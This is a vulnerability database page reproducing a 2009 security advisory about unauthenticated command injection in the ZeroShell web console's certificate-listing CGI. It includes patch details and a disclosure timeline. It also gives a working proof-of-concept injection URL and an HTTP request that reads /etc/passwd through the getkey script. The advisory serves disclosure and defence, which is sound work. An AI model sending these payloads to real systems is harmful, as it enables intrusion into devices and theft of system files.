Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability

🗓️ 09 Feb 2009 00:00:00Reported by ikkiType 
zdt
 zdt🔗 0day.today👁 84 Views

ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability in web console with improper input validatio

Code
==========================================================
ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
==========================================================





ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution 
for servers and embedded devices. This Linux distro can be configured 
and managed with an easy to use web console.

ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this 
weakness in order to compromise the entire system. 
Authentication is not required in order to exploit this flaw.

[Proof of Concept]
  
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
  
In addition to the Unix commands, it is possible to abuse the 
ZeroShell scripts themself. For instance it is likely to use the 
"getkey" script in order to retrieve remote files, including the content
in the html page.
  
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>


----------------------------------------------
Original Advisory: 

  

  ======================================================================== 
  ZeroShell <= 1.0beta11 Remote Code Execution
  ========================================================================
   
  Affected Software : ZeroShell <= 1.0beta11
  Severity          : High
  Local/Remote      : Remote
  Author            : Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
  Advisory URL      : http://www.ikkisoft.com/stuff/LC-2009-01.txt 
  
  [Summary]
  
  ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution 
  for servers and embedded devices. This Linux distro can be configured 
  and managed with an easy to use web console.
  
  ZeroShell is prone to an arbitrary code execution vulnerability due to
  an improper input validation mechanism. An aggressor may abuse this 
  weakness in order to compromise the entire system. 
  Authentication is not required in order to exploit this flaw.

  [Vulnerability Details]
  
  The ZeroShell web console uses a CGI program and several bash scripts 
  to provide all administrative functions. An improper input validation 
  mechanism permits the injection of arbitrary system commands.
  An unauthenticated user may invoke a function to retrieve all x509 
  certificates present in the repository, using the following GET request:
  https://<IP>/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user
  
  The parameter "type" is used to distinguish between users, CA and host 
  certificates. Unfortunately, this parameter is passed to the following 
  code without input validation at all:
  
  <-- cut here -->
  TYPE="$1"
  cd "$SSLDIR/certs" || exit 1
  ls *_${TYPE}.pem |awk -F"_$TYPE.pem" -v"TYPE=$TYPE" '{
  <-- cut here -->
  
  An aggressor may easily escape the hardcoded commands, adding arbitrary
  system commands. According to the default system configuration, these 
  commands are executed as "apache" (low privileges user).
  
  [Proof of Concept Exploit]
  
  /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
  
  In addition to the Unix commands, it is possible to abuse the 
  ZeroShell scripts themself. For instance it is likely to use the 
  "getkey" script in order to retrieve remote files, including the content
  in the html page.
  
  {HTTP REQUEST}
  GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
  /root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
  Host: <IP>

  [Fix Information]

  The vendor has published a patch for the release 1.0beta11 only.
  http://www.zeroshell.net/eng/patch-details/#C100

  The new release (1.0beta12) will be available soon.

  [Time Table]

  08/01/2009 - Vendor notified.
  08/01/2009 - Vendor response.
  11/01/2009 - Vendor patch release.
  09/02/2009 - Public disclosure.

  [Legal Notices]

  The information in the advisory is believed to be accurate at the 
  time of publishing based on currently available information. 
  This information is provided as-is, as a free service to the community. 
  There are no warranties with regard to this information.
  The author does not accept any liability for any direct, 
  indirect, or consequential loss or damage arising from use of, 
  or reliance on, this information.
  Permission is hereby granted for the redistribution of this alert,
  provided that the content is not altered in any way, except 
  reformatting, and that due credit is given.
  
  This vulnerability has been disclosed in accordance with the RFP 
  Full-Disclosure Policy v2.0, available at:
  http://www.wiretrip.net/rfp/policy.html





#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1
zeroshelllinux distributionremote code execution
84